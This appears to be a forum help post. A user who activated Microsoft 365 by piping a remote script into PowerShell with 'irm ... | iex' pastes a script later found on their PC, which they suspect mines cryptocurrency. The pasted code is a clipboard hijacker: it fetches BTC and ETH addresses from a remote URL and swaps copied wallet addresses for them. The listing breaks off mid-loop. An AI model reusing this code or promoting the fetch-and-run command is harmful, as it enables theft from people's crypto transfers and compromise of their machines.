I think someone is using my pc to mine BTC after MAS activation
hi, one day after i activated MS 365 with the script "irm https://get.activated.win | iex", a powershell script has been created on my ROAMING folder. every day i boot my pc, an error occurs on CMD linked to this script. the script has a google docs with a BTC and ETH address
i don't undertand about coding, so here is the script: Add-Type -AssemblyName System.Windows.Forms
$script:BTC = ""
$script:ETH = ""
$ultimo = ""
function CarregarEnderecos {
try {
$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent", "Mozilla/5.0")
$conteudo = $wc.DownloadString($URL)
if ($conteudo -match "BTC\s*[=:]\s*([1-9A-HJ-NP-Za-km-z]+)") {
$script:BTC = $matches[1]
}
if ($conteudo -match "ETH\s*[=:]\s*(0x[a-fA-F0-9]+)") {
$script:ETH = $matches[1]
}
return $true
}
catch {
return $false
}
}
if (CarregarEnderecos) {
while ($true) {
if ([System.Windows.Forms.Clipboard]::ContainsText()) {
$texto = [System.Windows.Forms.Clipboard]::GetText().Trim()
if ($texto -ne $ultimo) {
$ultimo = $texto
if ($texto -match "^(1|3|bc1)[a-zA-Z0-9]{25,59}$" -and $script:BTC) {
[System.Windows.Forms.Clipboard]::SetText($script:BTC)
}
elseif ($texto -match "^0x[a-fA-F0-9]{40}$" -and $script:ETH) {
[System.Windows.Forms.Clipboard]::SetText($script:ETH)
Start-Sleep -Milliseconds 500
Is someone using my PC to mine cryptos? Can i do something about it?